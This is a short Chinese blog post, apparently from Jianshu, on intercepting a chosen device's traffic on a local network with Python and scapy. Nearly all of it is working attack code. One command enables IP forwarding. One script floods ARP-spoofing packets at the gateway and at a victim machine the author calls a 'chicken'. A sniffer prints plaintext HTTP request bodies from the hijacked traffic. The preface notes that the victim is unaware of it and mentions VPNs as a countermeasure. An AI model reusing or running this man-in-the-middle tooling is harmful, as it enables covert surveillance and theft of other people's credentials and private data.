python_爬虫kali

scapy局域网实现定向设备抓包

2022-07-10  本文已影响0人  sexy_cyber

全局流量监控是一样的道理

遍历局域网alive的IP就行

前言

  1. 想想真的还是蛮可怕的,靶机一点感知都没有,就被监控了。
  2. 不过也有解决方案,反监控,就是搭建加密隧道(VPN),安全穿越小局域网,这和穿越大局域网是一个概念。

开干

echo 1 >> /proc/sys/net/ipv4/ip_forward
from scapy.all import *
from threading import Thread
import time

gateway_device = ARP()
# pdst目标机
gateway_device.pdst = "192.168.0.1"
# psrc源主机
gateway_device.psrc = "192.168.0.109"

chicken_device = ARP()
chicken_device.psrc = gateway_device.pdst
chicken_device.pdst = gateway_device.psrc
#向网关发送欺骗包
def wifi():
    while True:
        time.sleep(0.8)
        send(gateway_device)
#向肉鸡发送欺骗包
def chicken():
    while True:
        time.sleep(0.8)
        send(chicken_device)
t1 = Thread(target = wifi)
t2 = Thread(target = chicken)
t1.start()
t2.start()

from scapy.all import *


def capture(x):
    # if b'HTTP/' in x.lastlayer().original and x.lastlayer().original[0:4] != b'HTTP':
    # 监控http协议的流量,如果是VPN代理加密的,一般无法解密请求的头和请求体
    if b'HTTP/' in x.lastlayer().original:
    # if x.lastlayer().original:
        try:
            request_body = x.lastlayer().original
            request_body = request_body.decode('utf-8')
        except:
            request_body = str(x.lastlayer().original)
        if 'allall01.baidupcs.com' in request_body:
            return
        if 'netdisk' in request_body:
            return
        if 'baidu' in request_body:
            return
        dst_ip = x.payload.dst
        if dst_ip == '192.168.0.100':
            return
        print('dst ip:', dst_ip)
        request_body = request_body.replace('\\r\\n','\r\n')
        print('request body:', request_body)


def main():
    sniff(filter="tcp", prn=lambda x: capture(x))


if __name__ == '__main__':
    main()

上一篇下一篇

猜你喜欢

热点阅读